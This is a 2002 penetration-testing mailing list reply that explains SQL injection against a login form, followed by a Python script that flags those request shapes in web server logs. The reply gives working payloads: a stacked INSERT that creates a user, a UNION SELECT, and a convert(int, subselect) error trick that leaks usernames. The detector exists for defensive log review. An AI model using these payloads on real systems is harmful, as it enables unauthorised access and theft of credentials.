Penetration Testing mailing list archives
Re: sql table data enumeration help please.
From: "Kevin Spett" <kspett () spidynamics com>
Date: Thu, 9 May 2002 22:38:03 -0700
----- Original Message -----
From: "Gary O'leary-Steele" <GaryO () sec-1 com>
To: <pen-test () securityfocus com>
Sent: Thursday, May 09, 2002 12:47 PM
Subject: sql table data enumeration help please.

www.target.comUserName='insert into tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,Appointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31 2000 8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gary','addrto','appointment','01131234567','07796698919','garyo () sec-1 com',01131234567','sig','123','456','ls287sr','01132297541',1)--
Did you get an error message of some kind? Try using a semicolon after the username close quote and doing the INSERT in its own line.
In an attempt to gain access to data held with the username and password fields I have tried www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from tblusers where username >'a'--&password=hacker but get "Operand type clash: uniqueidentifier is incompatible with int"
This usually means that the column that you have used to inject (the ninth, in this case) is an int column in the original SELECT statement. The UNION SELECT column must have the same data type. Try using the convert() hack to get around this whole issue, like this:

username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM tblUsers WHERE Username > 'a')) + ''--

You should get an error message back complaining about type conversion, which includes the returned value from your subselect.

Kevin.
SPI Dynamics, Inc.
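For anyone reviewing web server logs for the request shapes discussed in this thread (a quoted parameter followed by UNION SELECT, a stacked INSERT, or a convert(int, (SELECT ...)) subselect), the following is an added example and not part of the original messages. The rule names, the `/login.asp` and `/search.asp` paths, the client addresses and the log lines are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are made up for this example; the patterns follow the payload
# shapes quoted in the thread (T-SQL syntax, matched case-insensitively).
RULES = {
    "union_select": re.compile(r"'\s*union\s+(?:all\s+)?select\b", re.I),
    "convert_subselect": re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "stacked_insert": re.compile(r"'\s*;?\s*insert\s+into\b", re.I),
    "trailing_comment": re.compile(r"--\s*(?:&|$)"),
}
# Client address and request target from a common-log-format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def find_rules(query):
    """Return the sorted names of rules matching a raw (URL-encoded) query string."""
    text = query
    for _ in range(3):  # bounded re-decoding also catches double-encoded input
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(lines):
    """Return (client, rules) for every log line whose query string matches a rule."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m or "?" not in m.group(2):
            continue  # only query strings are inspected; POST bodies are not logged
        rules = find_rules(m.group(2).split("?", 1)[1])
        if rules:
            findings.append((m.group(1), rules))
    return findings

# Constructed sample lines: two benign requests and the two shapes from the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/May/2002:12:40:01 -0700] "GET /login.asp?UserName=alice&password=x HTTP/1.0" 200 512',
    '192.0.2.77 - - [09/May/2002:12:41:13 -0700] "GET /login.asp?UserName=%27Union%20select%201,1,1,1,1,1,1,1,min(UserName)%20from%20tblusers%20where%20username%20%3E%27a%27--&password=x HTTP/1.0" 500 934',
    '192.0.2.77 - - [09/May/2002:12:44:52 -0700] "GET /login.asp?username=invalidusername%27%20%2B%20convert(int,%20(SELECT%20TOP%201%20UserName%20FROM%20tblUsers%20WHERE%20Username%20%3E%20%27a%27))%20%2B%20%27%27-- HTTP/1.0" 500 1010',
    '192.0.2.12 - - [09/May/2002:12:45:30 -0700] "GET /search.asp?q=student+union+select+committee HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for client, rules in scan(SAMPLE_LOG):
        print(client, ", ".join(rules))
```

The union_select and stacked_insert rules require a preceding quote, which is why the benign search for "student union select committee" is not flagged.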